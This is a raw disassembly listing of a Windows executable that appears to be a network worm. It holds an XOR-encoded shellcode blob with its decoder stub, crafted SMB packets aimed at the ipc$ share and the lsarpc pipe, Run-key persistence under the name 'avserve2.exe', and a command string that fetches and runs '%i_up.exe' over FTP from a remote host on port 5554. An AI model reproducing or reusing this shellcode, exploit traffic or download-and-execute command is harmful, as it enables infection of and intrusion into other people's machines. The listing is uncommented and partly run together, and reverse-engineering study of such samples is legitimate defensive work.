dd 7C801D77h, 7C80BE01h, 7C834E64h, 7C838AE7h, 7C8365A5h
dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C86136Dh, 7C910331h, 7C80929Ch, 7C80E93Fh, 7C8286EEh
dd 7C821363h, 7C80ADA0h, 7C9179FDh, 7C809A51h, 7C9105D4h
dd 7C8127A7h, 7C809915h, 7C812E76h, 7C80A490h, 7C838A0Ch
dd 7C809BF8h, 7C810D87h, 7C937A40h, 7C91043Dh, 7C809AE4h
dd 7C812BB6h, 7C810EF8h, 7C810E51h, 7C80CCA8h, 7C838DE8h
dd 7C80B6A1h, 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C81CDDAh
dd 7C801E16h, 7C80DDF5h, 7C862E2Ah, 7C81DF77h, 7C814AE7h
dd 7C80A0D4h, 7C81CF5Bh, 7C812F08h, 7C80CC97h, 7C812F39h
dd 0
dd 7E41A8ADh, 0
dd 71AC1028h, 71AB615Ah, 71AB428Ah, 71AB2B66h, 71AB3B91h
dd 71AB406Ah, 71AB88D3h, 71AB50C8h, 71AB3F41h, 71AB2BF4h
dd 71AB4FD4h, 71AB664Dh, 71AB3E00h, 71AB9639h, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 4
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 10h
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread_0 db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 4
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 10h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 191h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset sub_403C6B
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_4059BC+626h
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset aAvserve2_exe ; DATA XREF: sub_4020D7:loc_40212F�r
; sub_4020D7+B5�r
; "avserve2.exe"
dd offset aAvserve2 ; "avserve2"
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B08+1A�r
; sub_401B08+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B08+77�r
; sub_401B08+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B08+A8�r
; sub_401B08+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B08+2BC�r
; sub_401B08+2C9�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B08+184�r
; sub_401B08+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B08+1B9�r
; sub_401B08+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4FhaAvserve2 db 'avserve2',0 ; DATA XREF: .text:004068CC�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: .text:off_4068C8�o
align 4
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
aCWin2_log db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A2C dd 6EB06EBh, 0 dword_406A34 dd 1CEC8166h dword_406A38 dd 0E4FF07h dword_406A3C dd 302E35h dword_406A40 dd 312E35h aQuit db 'QUIT',0 ; DATA XREF: sub_401B08+2DA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B08+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B08+173�o
; sub_401EF0+D2�o
word_406A60 dw 2Ch ; DATA XREF: sub_401B08+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: sub_401B08+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B08+95�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_401B08+64�o
align 4
asc_406A7C: ; DATA XREF: sub_401EF0+102�o
unicode 0, < >,0
aJumpallsnlstil db 'JumpallsNlsTillt',0 ; DATA XREF: sub_402029+50�o
align 4
aJobaka3 db 'Jobaka3',0 ; DATA XREF: sub_402029+F�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4020D7+8C�o
align 4
asc_406ACC: ; DATA XREF: sub_4020D7+4B�o
unicode 0, <\>,0
off_406AD0 dd offset sub_402AFF ; DATA XREF: sub_402934+1C�r
dword_406AD4 dd 2 ; sub_4035C9+46�r
align 10h
off_406AE0 dd offset word_406AEA ; DATA XREF: sub_402810+1E�r
; sub_402A4C+12�r ...
dd offset word_406AEA
db 2 dup(0)
word_406AEA dw 20h ; DATA XREF: sub_403876+18�r
; .text:off_406AE0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CEC dd 1 dd 2Eh, 1
dword_406CF8 dd 0C0000005h ; sub_402D04+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D70 dd 3 dword_406D74 dd 7 dword_406D78 dd 0Ah dword_406D7C dd 8Ch ; sub_402BC3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D8C dd 19930520h, 4 dup(0) ; sub_403496+2�o
dword_406DA0 dd 2 ; sub_4035C9+28�r
off_406DA4 dd offset aR6002FloatingP ; DATA XREF: sub_4035C9+FC�r
; sub_4035C9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40536Ch, 9, 405340h, 0Ah, 40531Ch, 10h, 4052F0h
dd 11h, 4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
dd 19h, 405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
dd 78h, 405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
dd 0FFh, 405134h
byte_406E30 db 1 ; DATA XREF: sub_4035C9+1B�o
; sub_4038A7+E1�r
db 2, 4, 8
align 8
dword_406E38 dd 3A4h dword_406E3C dd 82798260h, 21h, 0dword_406E48 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F28 dd 3F8h ; sub_403CF4+5�r
align 10h
dword_406F30 dd 0CBBA84CEh ; sub_401000+10�w ...
dword_406F34 dd 0 ; sub_401210+D�r
dword_406F38 dd 0 ; sub_401398+C�o ...
dword_406F3C dd 0 ; sub_402680+91�w
dword_406F40 dd 0 ; sub_402D9F:loc_402DB1�r ...
align 8
dword_406F48 dd 0 dd 3 dup(0)
dword_406F58 dd 0A28h dword_406F5C dd 501h dword_406F60 dd 5 dword_406F64 dd 1 dword_406F68 dd 1 dword_406F6C dd 0DB0ED0h dd 0
dword_406F74 dd 0DB0D70h dd 3 dup(0)
off_406F84 dd offset aCM_unpackerPac ; DATA XREF: sub_402E58+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_406F8C db 0 ; DATA XREF: sub_402B10+2D�w
align 10h
dword_406F90 dd 0 dword_406F94 dd 0 ; sub_402B10+8B�w
dword_406F98 dd 0 ; sub_402BC3+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402E58:loc_402E6F�o
; .text:off_406F84�o
align 4
dd 31h dup(0)
dword_40707C dd 9 dup(0) ; .text:00406638�o ...
dword_4070A0 dd 1 ; sub_4030A5+23�w ...
dword_4070A4 dd 0 dword_4070A8 dd 1 ; sub_40371C:loc_403786�w
dword_4070AC dd 1 ; sub_403A40+4�w ...
dword_4070B0 dd 0 ; sub_404573+2E�w ...
dword_4070B4 dd 0 ; sub_404573:loc_4045C2�r
dword_4070B8 dd 0 ; sub_404573+60�r
dd 2 dup(0)
dword_4070C4 dd 0 dd 3 dup(0)
dword_4070D4 dd 0 ; sub_403A40+3A�r ...
dd 0
dword_4070DC dd 1 ; sub_4046FE+4C�w ...
dword_4070E0 dd 0 dword_4070E4 dd 0 dword_4070E8 dd 10h ; sub_4043C7+5�r ...
dword_4070EC dd 0 ; sub_403D93+259�r ...
dword_4070F0 dd 320650h ; sub_403D93+310�w ...
dword_4070F4 dd 0 ; sub_403D93+22C�r ...
dword_4070F8 dd 1 ; sub_403D68�r ...
dword_4070FC dd 320650h ; sub_403D68+8�r ...
dword_407100 dd 4E4h ; sub_4038A7+65�w ...
align 10h
dword_407110 dd 3 dup(0) ; sub_4038A7+171�o ...
dword_40711C dd 0 ; sub_4038A7+15D�w ...
byte_407120 db 0 ; DATA XREF: sub_403AE6:loc_403BF2�w
; sub_403AE6:loc_403C0F�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_407220 db 0 ; DATA XREF: sub_4038A7+5C�o
; sub_4038A7+AF�o ...
byte_407221 db 0 ; DATA XREF: sub_402EF1+3F�r
; sub_402EF1+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_407324 dd 0 ; sub_4038A7+12B�w ...
dword_407328 dd 320000h ; sub_403382+29�r ...
dd 5 dup(0)
dword_407340 dd 0DB0EF0h ; sub_4031D7+45�r ...
dword_407344 dd 3Fh dup(0) dword_407440 dd 20h ; sub_4031D7:loc_403261�r ...
dword_407444 dd 1 dword_407448 dd 1 dword_40744C dd 0 dword_407450 dd 0 ; sub_402B10+57�r
dword_407454 dd 0 dword_407458 dd 452340h ; sub_402D47+F�r ...
dd 6E9h dup(0)
_text ends
; Section 3. (virtual address 0001A000)
; Virtual size : 00020000 ( 131072.)
; Section size in file : 00020000 ( 131072.)
; Offset to raw data for section: 0001A000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_data segment para public 'CODE' use32
assume cs:_data
;org 41A000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_44475F
popa
jmp sub_40283E
start endp
; ---------------------------------------------------------------------------
db 0
byte_41A00D db 0F0h, 7Eh, 90h ; DATA XREF: .bss:off_44C7E0�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 6014A100h, 87A3A03Bh, 0D0065E3Ah, 0C90E6BEFh
dd 4DCDE7D0h, 852D475Dh, 8978DC42h, 181647F2h, 0F653DE26h
dd 6E855FB2h, 0FC6444B6h, 0A45F3E8Eh, 7DDF9674h, 0EB2775DCh
dd 24BDE464h, 502672DCh, 0E62759h, 6014C00h, 4B2FFD00h
dd 47h, 0
dd 0E00E000h, 2010B21h, 0BC0037h, 3A0000h, 6E0000h, 119600h
dd 100000h, 0D00000h, 0
dd 100010h, 20000h, 100h, 0
dd 400h, 0
dd 1A00000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 1900000h, 4C00h, 1600000h, 1CC00h, 6 dup(0)
dd 1700000h, 164000h, 14h dup(0)
dd 65742E00h, 7478h, 0BA2000h, 100000h, 0BA2000h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 6DB800h, 0D00000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 1D7400h, 1400000h, 1D7400h
dd 0C00000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 1CC00h, 1600000h, 1CC00h
dd 0DE0000h, 3 dup(0)
dd 6000h, 65722EC0h, 636F6Ch, 164800h, 1700000h, 164800h
dd 0E20000h, 3 dup(0)
dd 2000h, 64652E02h, 617461h, 4C00h, 1900000h, 4C00h, 0FA0000h
dd 3 dup(0)
dd 2000h, 40h, 65h dup(0)
dd 1B800h, 31C30000h, 4C8B40C0h, 41F70424h, 604h, 8B0F7400h
dd 8B082444h, 89102454h, 3B802h
db 2 dup(0), 0C3h
; =============== S U B R O U T I N E =======================================
sub_41A433 proc near ; CODE XREF: .data:0041A55B�p
; .data:0041A589�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001006h
push large dword ptr fs:0
mov large fs:0, esp
loc_41A450: ; CODE XREF: sub_41A433+44�j
; sub_41A433+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41A47F
cmp esi, [esp+1Ch+arg_4]
jz short loc_41A47F
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41A450
call dword ptr [ebx+esi*4+8]
jmp short loc_41A450
; ---------------------------------------------------------------------------
loc_41A47F: ; CODE XREF: sub_41A433+2A�j
; sub_41A433+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41A433 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A48D proc near ; CODE XREF: .data:0041A54E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001098h
push [ebp+arg_0]
call sub_425DC1
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41A48D endp
; ---------------------------------------------------------------------------
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_41A582
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41A4E0: ; CODE XREF: .data:0041A579�j
cmp esi, 0FFFFFFFFh
jz loc_41A591
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41A570
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10014034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10014038h, eax
mov eax, [edx+4]
mov ds:1001403Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10014040h
mov esi, ds:10014038h
rep movsd
lea edi, ds:10014040h
mov ds:10014038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_41A570
js short loc_41A57E
mov edi, [ebx+8]
push ebx
call sub_41A48D
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41A433
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_41A570: ; CODE XREF: .data:0041A4F1�j
; .data:0041A546�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_41A4E0
; ---------------------------------------------------------------------------
loc_41A57E: ; CODE XREF: .data:0041A548�j
xor eax, eax
jmp short loc_41A59B
; ---------------------------------------------------------------------------
loc_41A582: ; CODE XREF: .data:0041A4C5�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41A433
add esp, 0Ch
loc_41A591: ; CODE XREF: .data:0041A4E3�j
push 0Bh
call sub_425E09
add esp, 4
loc_41A59B: ; CODE XREF: .data:0041A580�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_41A5B4
call sub_41A5D0
loc_41A5B4: ; CODE XREF: .data:0041A5AD�j
call sub_425D4C
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10014000h
call eax
pop edi
pop esi
